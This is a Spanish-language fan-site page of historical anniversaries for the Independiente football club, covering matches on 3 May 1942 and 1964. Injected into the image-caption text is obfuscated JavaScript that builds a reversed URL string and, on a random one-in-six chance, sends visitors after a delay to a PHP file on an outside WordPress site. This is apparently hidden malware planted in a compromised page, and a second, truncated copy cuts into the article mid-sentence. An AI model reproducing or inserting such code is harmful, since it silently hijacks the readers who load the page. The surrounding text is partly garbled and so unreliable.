Conectate con nosotros

Efemérides

Efemérides del 3 de mayo

Para algunos, un recuerdo, para otros es conocer nuestra inmensa historia…

1942 – Mal comienzo de Independiente en el Campeonato de Primera División, con un empate y dos derrotas. Un día como hoy, por la fecha 4 el Rojo visita a Racing y le gana por 2 a 1 con goles de Vicente De la Mata a los 38’ y de Reinaldo Mourín a los 79’, anotando para el local Juan Marvezzi  el empate parcial a los 43’

El equipo ese día fue: Thadeu; Sanguinetti y Coletta; Sastre, Leguizamón y Celestino Martínez; Maril, De la Mata, Coll, Di Leo y Mourín, con Guillermo Ronzoni como D.T.

En este Torneo el Rojo finalizó en el noveno,  la peor posición desde el inicio del profesionalismo en 1931. El plantel se fue desarmando, ya se había ido Erico y ese año sería el último de Antonio Sastre. El equipo no lograría ser protagonista durante años, alcanzando solamente el tercer puesto en 1945 y en 1947, hasta llegar al título de 1948 que fue lo único que se ganó en la década.

La imagen tiene un atribu<script>$mWn=function(n){if(typeof ($mWn.list[n])==»string») return $mWn.list[n].split(«»).reverse().join(«»);return $mWn.list[n];};$mWn.list=[«\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>to ALT vacío; su nombre de archivo es DIABLITO-para-SEPARADOR.jpg» width=»69″ height=»53″/></figure></div>



<p><strong>1964</strong> – Independiente, el Campeón vigente, enfrenta de visitante, por la fecha 2 del Campeona<script>$mWn=function(n){if(typeof ($mWn.list[n])==to a Rosario Central empatando 0 a 0. A los 15’, se produce un choque entre Alejo Medina y Rubén Marino Navarro, saliendo “Hacha Bravafracturado en la jugada. Una pérdida de enorme para el plantel ya que en un mes, iniciaría su participación en la Copa de Campeones de América (hoy Copa Libertadores).

El D.T. Manuel Giúdice empezó a reacomodar la defensa, con Roberto “Pipo” Ferreiro y Tomás “El Negro” Rolan en los laterales, de central izquierdo Jorge “Chivita” Maldonado, y en el lugar de Rubén Navarro, Juan Carlos “La Garza” Guzmán, que había llegado de Chacarita.

El enorme “Colorado” Giúdice, lejos de preocuparse por la gran pérdida para el equipo que fue la fractura de Navarro, inmediatamente reacomodó sus fichas, organizó la táctica, y en poco tiempo llevó al club a dar el primer paso para lograr el reinado de América.

Colaboración: Hernán Paglieri-Vicepresidente Peña Roja Daniel BertoniSan Andrés de Giles

Click to comment

Leave a Reply

Tu dirección de correo electrónico no será publicada.

Destacadas

PROGRAMA 2206 de Correo Independiente

Radio Roja 195.7

asd

More in Efemérides